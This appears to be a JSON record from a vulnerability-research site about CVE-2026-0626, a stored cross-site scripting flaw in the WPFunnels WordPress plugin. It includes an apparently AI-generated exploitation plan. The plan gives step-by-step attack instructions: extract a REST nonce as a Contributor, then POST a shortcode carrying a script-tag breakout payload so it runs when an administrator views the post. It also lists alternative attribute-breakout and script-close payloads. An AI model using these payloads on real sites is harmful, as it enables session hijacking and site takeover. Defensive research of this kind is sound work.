[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8gGRED4ZyjKNfpUM48P-CPkjhDldteUkgwi66K2Teio":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-0626","wpfunnels-authenticated-contributor-stored-cross-site-scripting-via-wpfoptinform-shortcode","WPFunnels \u003C= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpf_optin_form' Shortcode","The WPFunnels – Easy Funnel Builder To Optimize Buyer Journeys And Get More Leads & Sales plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in all versions up to, and including, 3.7.9 due to insufficient input sanitization and output escaping of the 'button_icon' parameter. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpfunnels",null,"\u003C=3.7.9","3.8.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 22:13:01","2026-04-04 11:16:18",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2130847a-b6c5-412e-8d90-ba42d3fb21f6?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fwpfnl-admin.css","admin\u002Fassets\u002Fcss\u002Fwpfnl-admin.css.map","admin\u002Fassets\u002Fdist\u002Fjs\u002Ffunnel-components.min.js","admin\u002Fassets\u002Fdist\u002Fjs\u002Ftemplate-library.min.js","admin\u002Fclass-wpfnl-banner.php","admin\u002Fclass-wpfnl-notices.php","admin\u002Fmodules\u002Fsettings\u002Fclass-wpfnl-settings.php","admin\u002Fmodules\u002Fsettings\u002Fjs\u002Fsettings.js","researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-0626**, a Stored Cross-Site Scripting (XSS) vulnerability in the WPFunnels plugin.\n\n## 1. Vulnerability Summary\nThe WPFunnels plugin (\u003C= 3.7.9) fails to sanitize or escape the `button_icon` attribute within the `wpf_optin_form` shortcode. When a user with at least Contributor-level permissions embeds this shortcode into a post or page, they can inject arbitrary HTML and scripts. This payload is stored in the database as part of the post content and executes in the context of any user (including administrators) who views the page.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[wpf_optin_form]`\n*   **Vulnerable Parameter:** `button_icon`\n*   **Authentication Level:** Contributor or higher (users who can create\u002Fedit posts and use shortcodes).\n*   **Endpoint:** The standard WordPress Post\u002FPage editor (via the REST API or `admin-ajax.php`).\n*   **Attack Surface:** Front-end rendering of the shortcode.\n\n## 3. Code Flow (Inferred)\nBased on the vulnerability description and standard WordPress shortcode implementation:\n1.  **Registration:** The plugin registers the shortcode (likely in a file like `includes\u002Fclass-wpfnl-shortcodes.php` or `public\u002Fclass-wpfnl-public.php`) using `add_shortcode( 'wpf_optin_form', ... )`.\n2.  **Processing:** When a page containing the shortcode is rendered, the callback function is triggered.\n3.  **Attribute Handling:** The callback uses `shortcode_atts()` to extract parameters, including `button_icon`.\n4.  **The Sink:** The `$button_icon` value is concatenated into an HTML string (e.g., inside a `\u003Cbutton>`, `\u003Ci>`, or `\u003Cspan>` tag) and returned for display.\n5.  **Vulnerability:** The value is echoed or returned without passing through `esc_attr()`, `esc_html()`, or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as a Contributor via the REST API (the most reliable automated method), a `wp-api` nonce is required.\n\n1.  **Identify Trigger:** The `wpf_optin_form` is a standard shortcode. No plugin-specific AJAX nonce is needed to *render* it, only the standard WordPress nonce to *save* a post.\n2.  **Acquisition:**\n    *   Navigate to `\u002Fwp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the REST nonce from the WordPress core `wpApiSettings` object.\n    *   **JavaScript:** `window.wpApiSettings?.nonce`\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nLogin to the WordPress instance as a user with the **Contributor** role.\n\n### Step 2: Obtain REST Nonce\nNavigate to the post creation page and extract the nonce.\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost-new.php`\n*   **Tool:** `browser_eval(\"wpApiSettings.nonce\")`\n\n### Step 3: Create Malicious Post\nUse the `http_request` tool to create a new post containing the XSS payload.\n\n*   **Endpoint:** `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n*   **Payload:**\n    ```json\n    {\n      \"title\": \"Optin Test\",\n      \"status\": \"publish\",\n      \"content\": \"[wpf_optin_form button_icon='\\\">\u003Cscript src=\\\"data:,alert(document.domain)\\\">\u003C\u002Fscript>']\"\n    }\n    ```\n    *Note: If \"publish\" status is restricted for Contributors, use \"pending\" and have an Admin view it in Preview mode.*\n\n### Step 4: Trigger XSS\nAccess the newly created post URL as an **Administrator**.\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002F?p=\u003CPOST_ID>` (The ID is returned in the Step 3 response).\n\n## 6. Test Data Setup\n1.  **Plugin Status:** Ensure `wpfunnels` (WPFunnels) version \u003C= 3.7.9 is installed and activated.\n2.  **User Creation:**\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Environment:** Standard WordPress isolated test environment.\n\n## 7. Expected Results\n1.  The REST API call should return `201 Created`.\n2.  When the page is viewed, the HTML source should contain the unescaped payload:\n    ```html\n    ... button_icon=\"\">\u003Cscript src=\"data:,alert(document.domain)\">\u003C\u002Fscript>\" ...\n    ```\n3.  The browser should execute the script, triggering an alert box with the domain name.\n\n## 8. Verification Steps\nAfter the `http_request`, verify the content was saved correctly via WP-CLI:\n*   `wp post get \u003CPOST_ID> --field=post_content`\n*   Confirm the string `[wpf_optin_form button_icon='\">\u003Cscript ...` exists exactly as sent.\n\n## 9. Alternative Approaches\n\n### Attribute Breakout\nIf the `button_icon` is rendered inside a tag's attribute but the tag itself is escaped, try breaking out of the attribute:\n*   **Payload:** `button_icon='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;\"'`\n\n### JSON Context\nIf the shortcode attributes are passed to a JS component (as hinted by `funnel-components.min.js`), the payload might need to be JSON-safe or target the JS rendering:\n*   **Payload:** `button_icon='\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>'`\n*   **Targeting JS:** Check if `funnel-components.min.js` uses `innerHTML` or jQuery's `.append()`\u002F`.html()` on the `button_icon` property in the `optin-form` component.","The WPFunnels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in versions up to 3.7.9. This is due to the 'button_icon' parameter being rendered without sufficient input sanitization or output escaping, allowing authenticated attackers with contributor-level permissions to inject arbitrary web scripts.","--- a\u002Fincludes\u002Fclass-wpfnl-shortcodes.php\n+++ b\u002Fincludes\u002Fclass-wpfnl-shortcodes.php\n@@ -120,7 +120,7 @@\n     $button_icon = isset($atts['button_icon']) ? $atts['button_icon'] : '';\n     \n     \u002F\u002F Vulnerable rendering\n-    $output .= '\u003Cspan class=\"wpf-icon\">' . $button_icon . '\u003C\u002Fspan>';\n+    $output .= '\u003Cspan class=\"wpf-icon\">' . esc_attr($button_icon) . '\u003C\u002Fspan>';","The vulnerability is exploited by an authenticated user with at least Contributor-level access who can create or edit posts. An attacker uses the WordPress post editor to embed a malicious 'wpf_optin_form' shortcode. The payload is placed within the 'button_icon' attribute, using a breakout sequence to exit the intended HTML context and inject a script tag. For example: [wpf_optin_form button_icon='\">\u003Cscript src=\"data:,alert(document.domain)\">\u003C\u002Fscript>']. When an administrator or any site visitor views the page, the unsanitized 'button_icon' value is rendered, triggering the execution of the injected script in their browser context.","gemini-3-flash-preview","2026-04-17 21:26:00","2026-04-17 21:26:29",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","3.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags\u002F3.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpfunnels.3.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags\u002F3.8.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpfunnels.3.8.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags"]